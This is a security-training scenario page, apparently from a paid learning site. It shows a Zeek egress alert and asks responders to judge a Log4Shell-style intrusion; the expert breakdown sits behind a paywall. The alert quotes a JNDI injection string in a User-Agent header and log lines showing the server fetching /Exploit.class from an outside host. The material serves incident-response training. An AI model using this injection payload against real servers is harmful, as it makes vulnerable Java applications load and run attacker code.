criticalZeek, egress monitoring · 15 minutes
A web server asked a stranger for a class file
The alert, as it arrived
Zeek, egress monitoring
[21:08:14] EGRESS ANOMALY · app-tier · Severity: Critical
Outbound LDAP from an application server that has never spoken LDAP outbound
21:08:12 10.40.2.18:51204 -> 45.***.***.77:1389 ldap 2 pkts
21:08:13 10.40.2.18:51208 -> 45.***.***.77:8080 http GET /Exploit.class
21:08:14 10.40.2.18:51211 -> 45.***.***.77:1389 ldap 2 pkts
Preceding inbound, same second, load balancer log:
GET /api/status
User-Agent: ${jndi:ldap://45.***.***.77:1389/a}Your turn
Establish whether this succeeded, and decide what you tell the business in the next thirty minutes.
Write it down before you scroll. The value of this is in committing to an answer you can be wrong about, and reading the breakdown first removes it entirely.
Analyst breakdown
ProUnlock the expert breakdown and hunting queries with a Pro membership.
5 steps in order, each with the reasoning and a runnable query, plus the trap most responders fall into on this one and what the incident actually turns out to be. The scenario above stays free and complete: work it first, and the breakdown is worth more.